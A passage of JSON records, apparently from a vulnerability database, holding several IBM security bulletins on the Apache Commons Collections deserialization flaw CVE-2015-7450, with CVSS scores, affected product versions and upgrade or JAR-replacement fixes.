{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:15", "id": "41ADAB729B11FDB0C9A1ECE9F3517886DD3424A62720D68D65491C2312EABAA7", "href": "https://www.ibm.com/support/pages/node/272679", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:37", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Business Monitor. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [HTTP response splitting attack in WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21966837>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n * * IBM Business Monitor V8.5.6.0\n * IBM Business Monitor V8.5.5.0\n * IBM Business Monitor V8.0.1.x\n * IBM Business Monitor V7.5.1.x\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:12", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Monitor", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:12", "id": "48A7A86609AA5A4F2D4F680FB304201D32309B43DF293404223682EC302FA4E5", "href": "https://www.ibm.com/support/pages/node/272157", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:36", "description": "## Summary\n\nC\u00faram SPM uses the Apache Commons Collections Library. Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system.\n\n## Vulnerability Details\n\n**CVEID:**[](<https://vulners.com/cve/CVE-2015-7450>) [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:**Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8** \n**CVSS Temporal Score: See[](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM C\u00faram Social Program Management 5.2 \nIBM C\u00faram Social Program Management 6.0 SP2 \nIBM C\u00faram Social Program Management 6.0.4 \nIBM C\u00faram Social Program Management 6.0.5 \nIBM C\u00faram Social Program Management 6.1 \nIBM Care Management 6.0 \n\n## Remediation/Fixes\n\nProduct\n\n| VRMF| _Remediation/First Fix_ \n---|---|--- \nC\u00faram SPM| 5.2 SP6| Visit IBM Fix Central and upgrade to [5.2 SP6 EP9](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=5.2&platform=All&function=all>) or a subsequent 5.2 Release \nC\u00faram SPM| 6.0 SP2| Visit IBM Fix Central and upgrade to [6.0 SP2 EP28](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.0&platform=All&function=all>) or a subsequent 6.0 Release \nC\u00faram SPM| 6.0.4.6| Visit IBM Fix Central and upgrade to [6.0.4.6 iFix2](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.0.4.6&platform=All&function=all>) or a subsequent 6.04 Release \nC\u00faram SPM| 6.0.5| Visit IBM Fix Central and upgrade to [6.0.5.9 iFix1](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.0.5.9&platform=All&function=all>) or a subsequent 6.0.5 Release \nC\u00faram SPM| 6.1| Visit IBM Fix Central and upgrade to [6](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.1.1.0&platform=All&function=all>)[.1.1 iFix1](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%2BCities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.1.1.0&platform=All&function=all>) or a subsequent 6.1 Release \nC\u00faram Care Management| 6.0| See Workarounds & Mitigations \n \n## Workarounds and Mitigations\n\n**Care Management Release:** \n \nCustomers should contact IBM C\u00faram support if they require a security fix. \n \n**For older revisions of C\u00faram SPM:** \n \nIt is recommended that customers upgrade to the latest C\u00faram SPM release to resolve this issue. Customers may apply the following steps to resolve the issue while they prepare to upgrade. \n \nThe 3.2.2 version of the [Commons Collections JAR](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>) should be used to replace the existing references at the following locations within the JDE deliverable: \n \n\\- CuramSDEJ\\lib\\commons-collections-3.x.jar (for 5.2 releases, the version is \"commons-collections-3.1.jar\", for all other releases it is \"commons-collections-3.2.1.jar\") - rename the newly downloaded Commons Collections JAR to match the name of the Commons Collections JAR file that is present in this location. Replace the existing Commons Collection JAR with the new JAR. It is important to rename the new JAR to match the JAR being replaced as this will ensure that no build script changes are required as a result of this update. \n \n\\- CuramCDEJ\\lib\\ext\\jar\\commons-collections.jar - replace this file with the newly downloaded JAR. \n \nCustomers can perform their process to test the changes, and then build and deploy to the required environment.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T13:06:24", "type": "ibm", "title": "Security Bulletin: Apache Commons Collections affects C\u00faram Social Program Management (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T13:06:24", "id": "7ADA99C6F6CBC1C4CB732F884DB11AD6B5BB2132DE3162727948C9DEE857DEB3", "href": "https://www.ibm.com/support/pages/node/272703", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:50:48", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Security Key Lifecycle Manager (SKLM). Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: Vulnerability in Apache Commons affect IBM WebSphere Application Server (__CVE-2015-7450__)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \n \nIBM Security Key Lifecycle Manager (SKLM) v2.5 on distributed platforms | WebSphere Application Server v8.5.5 \n \nIBM Security Key Lifecycle Manager (SKLM) v2.6 on distributed platforms | WebSphere Application Server v8.5.5.7 \n \n## Remediation/Fixes\n\n_None_\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:35:02", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T21:35:02", "id": "7196C8D1335ADFCDC76659DB37704C37F43BFC5EAAC5070B6B965CB49E2ED826", "href": "https://www.ibm.com/support/pages/node/271933", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:19", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Content Collector.\n\n## Vulnerability Details\n\n**CVEID**: CVE-2015-7450 \n**DESCRIPTION**: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score:See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Content Collector 2.2.0 - 4.0.1\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_ | _Remediation/First Fix_ \n---|---|--- \nIBM Content Collector | 2.2.0 | Follow the guidance in [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \nfor IBM WebSphere Application Server 7.0. \nIBM Content Collector \non Windows 32-bit operating system | 3.0.0 - 4.0.1 | 1\\. Review the instructions in Interim Fix [_4.0.1.0-IBM-ICC-IF003_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=Enterprise%2BContent%2BManagement&product=ibm/Information+Management/Content+Collector&release=4.0.1.0&platform=ALL&function=fixId&fixids=4.0.1.0-IBM-ICC-IF003&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>), available from Fix Central. \n2\\. Follow the guidance in \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \nfor IBM WebSphere Application Server 8.0. \nIBM Content Collector \non Windows 64-bit operating system | 3.0.0 - 4.0.1 | 1\\. Apply Interim Fix [_4.0.1.0-IBM-ICC-IF003_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=Enterprise%2BContent%2BManagement&product=ibm/Information+Management/Content+Collector&release=4.0.1.0&platform=ALL&function=fixId&fixids=4.0.1.0-IBM-ICC-IF003&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>), available from Fix Central. \n2\\. Follow the guidance in [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>)for IBM WebSphere Application Server 8.0. \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:13:28", "type": "ibm", "title": "Security Bulletin:Vulnerability in Apache Commons affects IBM Content Collector (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T12:13:28", "id": "8287275EEC72C6CC4E80477CA04131224FEE84C5F897F0E0579443793E0C38AF", "href": "https://www.ibm.com/support/pages/node/271957", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-12T02:10:42", "description": "## Summary\n\nIBM WebSphere\u00ae Application Server is shipped as a component of the following IBM Rational products: Collaborative Lifecycle Management (CLM), Rational Requirements Composer (RRC), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rhapsody Design Manager (Rhapsody DM), Rational Software Architect Design Manager (RSA DM), Rational Team Concert (RTC), and Rational Quality Manager (RQM). Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nIBM Jazz Team Server may be deployed on either IBM WebSphere Application Server (WAS) or Apache Tomcat. This bulletin is for those deployments using WAS. \n \nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nRational Collaborative Lifecycle Management 3.0.1 - 6.0 \n \nRational Quality Manager 2.0 - 2.0.1 \nRational Quality Manager 3.0 - 3.0.1.6 \nRational Quality Manager 4.0 - 4.0.7 \nRational Quality Manager 5.0 - 5.0.2 \nRational Quality Manager 6.0 \n \nRational Team Concert 2.0 - 2.0.0.2 \nRational Team Concert 3.0 - 3.0.6 \nRational Team Concert 4.0 - 4.0.7 \nRational Team Concert 5.0 - 5.0.2 \nRational Team Concert 6.0 \n \nRational Requirements Composer 2.0 - 2.0.0.4 \nRational Requirements Composer 3.0 - 3.0.1.6 \nRational Requirements Composer 4.0 - 4.0.7 \n \nRational DOORS Next Generation 4.0 - 4.0.7 \nRational DOORS Next Generation 5.0 - 5.0.2 \nRational DOORS Next Generation 6.0 \n \nRational Engineering Lifecycle Manager 1.0- 1.0.0.1 \nRational Engineering Lifecycle Manager 4.0.3 - 4.0.7 \nRational Engineering Lifecycle Manager 5.0 - 5.0.2 \nRational Engineering Lifecycle Manager 6.0 \n \nRational Rhapsody Design Manager 3.0 - 3.0.1 \nRational Rhapsody Design Manager 4.0 - 4.0.7 \nRational Rhapsody Design Manager 5.0 - 5.0.2 \nRational Rhapsody Design Manager 6.0 \n \nRational Software Architect Design Manager 3.0 - 3.0.1 \nRational Software Architect Design Manager 4.0 - 4.0.7 \nRational Software Architect Design Manager 5.0 - 5.0.2 \nRational Software Architect Design Manager 6.0\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-28T18:35:50", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere\u00ae Application Server shipped with multiple IBM Rational products based on IBM's Jazz technology (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2021-04-28T18:35:50", "id": "6C099EB2D7A6A7FB08F677C5022E99A80942C8B6F6F4DD59D6C967A34499E8CB", "href": "https://www.ibm.com/support/pages/node/272731", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:40", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Enterprise Service Bus Registry Edition. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Vulnerability in Apache Commons affect IBM WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nWebSphere Enterprise Service Bus Registry Edition - All versions\n\n## ", "cvss3": {}, "published": "2018-06-15T07:03:53", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in\u00a0WebSphere Application Server\u00a0shipped with\u00a0WebSphere Enterprise Service Bus Registry Edition (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:03:53", "id": "A6B089124F750729C2A5DCFDD551701AB74968E1A86A4C4BE83273F5F8E1BE38", "href": "https://www.ibm.com/support/pages/node/272873", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-24T05:46:43", "description": "## Summary\n\nWebSphere\u00ae Application Server is shipped with IBM\u00ae Intelligent Operations Center. Information about a security vulnerability affecting WebSphere\u00ae Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletins(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM\u00ae Intelligent Operations Center | V1.5.0, V1.6.0, V1.6.0.1, V1.6.0.2, V1.6.0.3, and V5.2.1 \nIBM\u00ae Intelligent Operations Center for Emergency Management | V1.6.0, V5.1.0, V5.1.0.2, V5.1.0.3, V5.1.0.4, and V5.1.0.6 \nIBM\u00ae Intelligent Operations for Waternamics | V5.1.0, V5.2.0, V5.2.0.1, V5.2.0.2, V5.2.0.3, V5.2.0.4, V5.2.0.5, V5.2.0.6, V5.2.1, and V5.2.1.1 \nIBM\u00ae Intelligent Water | V1.6.0, V1.6.1, V1.6.1.1, and V1.6.1.2 \n \n## Remediation/Fixes\n\nRefer to the following security bulletin for vulnerability details and information about fixes addressed by IBM\u00ae WebSphere Application Server which is shipped with IBM\u00ae Intelligent Operations Center: Principal Product and Version(s) | Affected Supporting Product and Versions | Affected Supporting Product Security Bulletin \n---|---|--- \nIBM\u00ae Intelligent Operations Center V1.5.0, V1.6.0, V1.6.0.1, V1.6.0.2, V1.6.0.3, and V5.2.1 | WebSphere\u00ae Application Server V7.0, V8.0, and V8.5 and V8.5.5 Traditional and Liberty \n| [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/271209> \"Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server \$CVE-2015-7450\$\" ) \nIBM\u00ae Intelligent Operations Center for Emergency Management V1.6.0, V5.1.0, V5.1.0.2, V5.1.0.3, V5.1.0.4, and V5.1.0.6 \nIBM\u00ae Intelligent Operations for Waternamics V5.1.0, V5.2.0, V5.2.0.1, V5.2.0.2, V5.2.0.3, V5.2.0.4, V5.2.0.5, V5.2.0.6, V5.2.1, and V5.2.1.1 \nIBM\u00ae Intelligent Water V1.6.0, V1.6.1, V1.6.1.1, and V1.6.1.2 \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-27T13:02:15", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere\u00ae Application Server shipped with IBM\u00ae Intelligent Operations Center (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-01-27T13:02:15", "id": "F35FDA3FF3046C6563BADEA4BC09118605630A1545FA6231B3C59C74E1C66307", "href": "https://www.ibm.com/support/pages/node/1283512", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:39:12", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM WebSphere Application Server Patterns. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletins(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nWebSphere Application Server Patterns, all versions| WebSphere Application Server: \n\n * Version 9.0 \n \n\n\n## Remediation/Fixes\n\nPlease consult the following security bulletin for vulnerability details and information about fixes \n\n * [Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105> \"Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable \$CVE-2015-7450\$\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": "ibm", "title": "Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center bundled with IBM WebSphere Application Server Patterns", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-20T08:47:33", "id": "7AE79CBB38C9B30F603A5F44A9B8F142162D6B14888148AC3503AD993B81C776", "href": "https://www.ibm.com/support/pages/node/1111263", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T05:37:42", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Virtualization Engine TS7700.\n\n## Vulnerability Details\n\n**CVEID**: [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION**: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAll versions of microcode for the IBM Virtualization Engine TS7700 (3957-V06, 3957-V07, 3957-VEA, 3957-VEB) prior to release R2.1 are affected. All versions of R3.0 and R3.1 are also affected. In addition, microcode versions of releases R2.1, R3.2, and R3.3 prior to and including the following are also affected: \n\n**Release**\n\n| **Version** \n---|--- \nR3.3| 8.33.0.45 \nR3.2| 8.32.1.8 \nR2.1| 8.21.0.178 \n \n## Remediation/Fixes\n\nContact IBM Service at 1-800-IBM-SERV to arrange an upgrade to the latest microcode level followed by the installation of vtd_exec.202. Minimum microcode levels are shown below: \n\n**Release**\n\n| **Fix** \n---|--- \nR3.3| Upgrade to 8.33.0.45 or later + vtd_exec.202 \nR3.0, R3.1 or R3.2| Upgrade to 8.32.1.8 or later + vtd_exec.202 \nR2.1| Upgrade to 8.21.0.178 or later + vtd_exec.202 \nOlder Releases| Upgrade to 8.21.0.178 or later + vtd_exec.202 \n \nPlease note that vtd_exec packages carry their own internal version numbers. For the vulnerabilities reported in this Security Bulletin, the minimum required vtd_exec versions are as follows: **Package**| **Version** \n---|--- \nvtd_exec.202| 1.8 \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T00:10:15", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Virtualization Engine TS7700 (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T00:10:15", "id": "86049AD5B728A475ACFB48AEFA39FBAE662CCDAA8014795312D69A9E860527D2", "href": "https://www.ibm.com/support/pages/node/690767", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:47:11", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Maximo Asset Management, Maximo Asset Management Essentials, Maximo Industry Solutions (including Maximo for Energy Optimization, Maximo for Government, Maximo for Nuclear Power, Maximo for Transportation, Maximo for Life Sciences, Maximo for Oil and Gas, and Maximo for Utilities), Maximo Adapter for Primavera, IBM Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Change and Configuration Management Database, and TRIRIGA Energy Optimization. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult [_Security 